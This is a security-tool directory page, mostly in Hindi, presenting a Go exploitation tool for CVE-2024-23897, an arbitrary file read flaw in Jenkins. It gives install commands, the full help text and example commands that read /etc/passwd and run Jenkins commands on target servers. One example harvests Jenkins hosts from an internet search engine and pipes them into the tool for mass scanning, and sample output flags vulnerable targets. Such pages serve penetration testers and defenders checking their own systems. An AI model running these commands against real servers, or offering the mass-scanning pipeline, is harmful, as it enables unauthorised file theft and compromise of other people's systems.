Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-23897 — CVE-2024-23897 - Jenkins आर्बिट्रेरी फ़ाइल रीड एक्सप्लॉइटेशन टूल | Kitploit
उपकरण/GitHubGitHub/wjlin0/cve-2024-23897
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubwjlin0/cve-2024-23897

CVE-2024-23897

CVE-2024-23897 - Jenkins आर्बिट्रेरी फ़ाइल रीड एक्सप्लॉइटेशन टूल

रिपॉजिटरी देखें
86102 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-23897 - Jenkins मनमाना फ़ाइल पढ़ने का शोषण उपकरण

GitHub Repo stars

स्थापना

CVE-2024-23897 को स्थापित करने के लिए go 1.21 की आवश्यकता है। निम्नलिखित कमांड चलाएँ:

root@kitploit:~
go install github.com/wjlin0/CVE-2024-23897/cmd/CVE-2024-23897@latest

या तैयार बाइनरी फ़ाइल release से डाउनलोड करें

  • macOS-arm64

  • macOS-amd64

  • linux-amd64

  • windows-amd64

  • windows-386

उपयोग

root@kitploit:~
CVE-2024-23897 -help
root@kitploit:~
CVE-2024-23897 is a tool for scanning for CVE-2024-23897

Usage:
  CVE-2024-23897 [flags]

Flags:
INPUT:
   -url, -u string[]  URL to scan. (e.g. -u https://example.com)
   -list string[]     File containing list of URLs to scan. (e.g. -list list.txt)

CONFIG:
   -c, -command string[]           JinKens Command to run. (e.g. -c 'who-am-i')
   -a, -args string[]              JinKens Command args.
   -e, -exec                       JinKens Execute command.
   -lac, -list-available-commands  List available commands.

OUTPUT:
   -no-color  Don't Use colors in output

DEBUG:
   -debug                           Enable debugging
   -p, -proxy string[]              list of http/socks5 proxy to use (comma separated or file input)
   -irt, -input-read-timeout value  timeout on input read (default 3m0s)
   -version                         show version of CVE-2024-23897 tool
   -header string[]                 Add custom headers(or on file contents) to the request(e.g. -header 'Cookie: username=admin' or  -header header.txt)
   -no-stdin                        disable stdin processing

LIMIT:
   -timeout int          time to wait in seconds before timeout (default 10)
   -t, -thread int       Number of concurrent threads (default 30)
   -rl, -rate-limit int  Rate limit for enumeration speed (n req/sec) (default -1)

UPDATE:
   -update                      Update tool
   -duc, -disable-update-check  Disable update check


Examples:
Run CVE-2024-23897 check vulnerability on a single targets
        $ CVE-2024-23897 -url https://example.com

Run CVE-2024-23897 check vulnerability on list of targets
        $ CVE-2024-23897 -list list.txt

Run CVE-2024-23897 read full file contents on a single targets
        $ CVE-2024-23897 -url https://example.com -c reload-job -a /etc/passwd

Run CVE-2024-23897 read available commands on a single targets
        $ CVE-2024-23897 -url https://example.com -lac

Run CVE-2024-23897 execute the JenKings command
        $ CVE-2024-23897 -url https://example.com -c reload-job -a job_name -exec

Run CVE-2024-23897 check vulnerability on a single targets by proxy server
        $ CVE-2024-23897 -url https://example.com  -proxy http://127.0.0.1:7890

Run CVE-2024-23897 on uncovering Jenkins check vulnerability
        $ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897

लक्ष्य एकत्र करने और उन्हें मानक इनपुट के माध्यम से CVE-2024-23897 को भेजने के लिए pathScan का उपयोग करें

root@kitploit:~
pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897

आपकी गोपनीयता की रक्षा के लिए, मैंने कुछ आउटपुट हटा दिए हैं

root@kitploit:~
➜ ~ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897

   _______    ________    ___  ____ ___  __ __       ___  _____ ____  ____ _____
  / ____| |  / / ____/   |__ \/ __ |__ \/ // /      |__ \|__  /( __ )/ __ /__  /
 / /    | | / / __/________/ / / / __/ / // /_________/ / /_ </ __  / /_/ / / /
/ /___  | |/ / /__/_____/ __/ /_/ / __/__  __/_____/ __/___/ / /_/ /\__, / / /
\____/  |___/_____/    /____\____/____/ /_/       /____/____/\____//____/ /_/


Jenkins मनमाना फ़ाइल पढ़ने की भेद्यता
						wjlin0.com

सावधानी से उपयोग करें। आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं
डेवलपर किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

[INF] Loaded 50 targets from input
[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable.
please use command and to read file first content.
$ CVE-2024-23897 -u https://example.com -c who-am-i -a /etc/passwd

[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable && This cab read full file contents
please use command and to read full body 
$ CVE-2024-23897 -u https://example.com -c connect-node -a /etc/passwd
......
......
......
......
......
[INF] took 92.75 seconds with 13 successful requests

भेद्यता विश्लेषण

यदि आप भेद्यता विवरण के बारे में अधिक जानना चाहते हैं, तो आप इस भेद्यता के phith0n के विश्लेषण को देख सकते हैं।

  • Jenkins मनमाना फ़ाइल पढ़ने की भेद्यता का विश्लेषण
टूल डाउनलोड करें